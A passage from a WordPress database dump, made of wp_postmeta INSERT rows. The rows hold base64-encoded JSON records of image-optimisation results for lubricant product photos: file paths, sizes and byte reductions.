d3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9kcnlmaWxtLWx1YnJpY2FudC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6OTMzLCJ0aW1lIjoxNDgzNTY3MDM1LCJpZCI6MTY3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9kcnlmaWxtLWx1YnJpY2FudC04MDB4NTc5LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTc5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2RyeWZpbG0tbHVicmljYW50LTgwMHg1NzkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZHJ5ZmlsbS1sdWJyaWNhbnQtODAweDU3OS5qcGciLCJyZWR1Y3Rpb24iOjI3NDQsInRpbWUiOjE0ODM1NjcwMzksImlkIjoxNjc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2RyeWZpbG0tbHVicmljYW50LTc2OHg1NTYuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NTYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZHJ5ZmlsbS1sdWJyaWNhbnQtNzY4eDU1Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9kcnlmaWxtLWx1YnJpY2FudC03Njh4NTU2LmpwZyIsInJlZHVjdGlvbiI6MjU1MSwidGltZSI6MTQ4MzU2NzA0MywiaWQiOjE2NzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZHJ5ZmlsbS1sdWJyaWNhbnQtMTYwMHgxMTU4LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjExNTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZHJ5ZmlsbS1sdWJyaWNhbnQtMTYwMHgxMTU4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2RyeWZpbG0tbHVicmljYW50LTE2MDB4MTE1OC5qcGciLCJyZWR1Y3Rpb24iOjk5MDMsInRpbWUiOjE0ODM1NjcwNDgsImlkIjoxNjc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2RyeWZpbG0tbHVicmljYW50LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZHJ5ZmlsbS1sdWJyaWNhbnQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9kcnlmaWxtLWx1YnJpY2FudC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjY5LCJ0aW1lIjoxNDgzNTY3MDUyLCJpZCI6MTY3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9kcnlmaWxtLWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2RyeWZpbG0tbHVicmljYW50LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZHJ5ZmlsbS1sdWJyaWNhbnQtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUxNywidGltZSI6MTQ4MzU2NzA1NSwiaWQiOjE2NzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZHJ5ZmlsbS1sdWJyaWNhbnQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9kcnlmaWxtLWx1YnJpY2FudC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2RyeWZpbG0tbHVicmljYW50LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1OTEsInRpbWUiOjE0ODM1NjcwNTgsImlkIjoxNjc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2RyeWZpbG0tbHVicmljYW50LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZHJ5ZmlsbS1sdWJyaWNhbnQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9kcnlmaWxtLWx1YnJpY2FudC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTkzMCwidGltZSI6MTQ4MzU2NzA2MiwiaWQiOjE2NzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9kcnlmaWxtLWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2RyeWZpbG0tbHVicmljYW50LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZHJ5ZmlsbS1sdWJyaWNhbnQtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQxNSwidGltZSI6MTQ4MzU2NzA2NSwiaWQiOjE2NzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9kcnlmaWxtLWx1YnJpY2FudC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2RyeWZpbG0tbHVicmljYW50LTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZHJ5ZmlsbS1sdWJyaWNhbnQtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjc0NSwidGltZSI6MTQ4MzU2NzA2OSwiaWQiOjE2NzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9kcnlmaWxtLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2RyeWZpbG0tbHVicmljYW50LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZHJ5ZmlsbS1sdWJyaWNhbnQtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjcwNCwidGltZSI6MTQ4MzU2NzA3MiwiaWQiOjE2NzZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29330, 1674, 'wpfc_optimisation_reduction', '14478'); 
INSERT INTO `wp_postmeta` VALUES (29331, 1674, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC10cmlib3N5cy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtdHJpYm9zeXMuanBnIiwid2lkdGgiOjQxMDgsImhlaWdodCI6MzExNiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NzA3NywiaWQiOiIxNjc0In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LXRyaWJvc3lzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC10cmlib3N5cy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtdHJpYm9zeXMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjcyMSwidGltZSI6MTQ4MzU2NzA4MCwiaWQiOjE2NzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC10cmlib3N5cy04MDB4NjA3LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NjA3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtdHJpYm9zeXMtODAweDYwNy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LXRyaWJvc3lzLTgwMHg2MDcuanBnIiwicmVkdWN0aW9uIjoxMzY3LCJ0aW1lIjoxNDgzNTY3MDg0LCJpZCI6MTY3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LXRyaWJvc3lzLTc2OHg1ODMuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1ODMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC10cmlib3N5cy03Njh4NTgzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtdHJpYm9zeXMtNzY4eDU4My5qcGciLCJyZWR1Y3Rpb24iOjEyOTcsInRpbWUiOjE0ODM1NjcwODgsImlkIjoxNjc0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtdHJpYm9zeXMtMTYwMHgxMjE0LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEyMTQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC10cmlib3N5cy0xNjAweDEyMTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC10cmlib3N5cy0xNjAweDEyMTQuanBnIiwicmVkdWN0aW9uIjo2MDQzLCJ0aW1lIjoxNDgzNTY3MDkyLCJpZCI6MTY3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LXRyaWJvc3lzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC10cmlib3N5cy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtdHJpYm9zeXMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYyNywidGltZSI6MTQ4MzU2NzA5NSwiaWQiOjE2NzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC10cmlib3N5cy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtdHJpYm9zeXMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LXRyaWJvc3lzLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MzksInRpbWUiOjE0ODM1NjcwOTksImlkIjoxNjc0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtdHJpYm9zeXMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LXRyaWJvc3lzLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC10cmlib3N5cy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTYzLCJ0aW1lIjoxNDgzNTY3MTAyLCJpZCI6MTY3NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LXRyaWJvc3lzLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC10cmlib3N5cy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtdHJpYm9zeXMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEwNDksInRpbWUiOjE0ODM1NjcxMDYsImlkIjoxNjc0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC10cmlib3N5cy0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtdHJpYm9zeXMtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LXRyaWJvc3lzLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo2MDcsInRpbWUiOjE0ODM1NjcxMDksImlkIjoxNjc0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC10cmlib3N5cy0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtdHJpYm9zeXMtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LXRyaWJvc3lzLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo3NTMsInRpbWUiOjE0ODM1NjcxMTIsImlkIjoxNjc0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC10cmlib3N5cy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtdHJpYm9zeXMtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LXRyaWJvc3lzLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo5MTIsInRpbWUiOjE0ODM1NjcxMTYsImlkIjoxNjc0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29332, 1672, 'wpfc_optimisation_reduction', '3065067'); 
INSERT INTO `wp_postmeta` VALUES (29333, 1672, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29ubmVjdG9yLWx1YnJpY2FudC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbm5lY3Rvci1sdWJyaWNhbnQuanBnIiwid2lkdGgiOjMwMDAsImhlaWdodCI6MjAwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbm5lY3Rvci1sdWJyaWNhbnQuanBnIiwicmVkdWN0aW9uIjozMDY1MDU2LCJ0aW1lIjoxNDgzNTY3MTI4LCJpZCI6IjE2NzIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbm5lY3Rvci1sdWJyaWNhbnQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb25uZWN0b3ItbHVicmljYW50LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29ubmVjdG9yLWx1YnJpY2FudC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzEzMCwiaWQiOjE2NzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29ubmVjdG9yLWx1YnJpY2FudC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbm5lY3Rvci1sdWJyaWNhbnQtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1jb25uZWN0b3ItbHVicmljYW50LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3MTMzLCJpZCI6MTY3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb25uZWN0b3ItbHVicmljYW50LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cu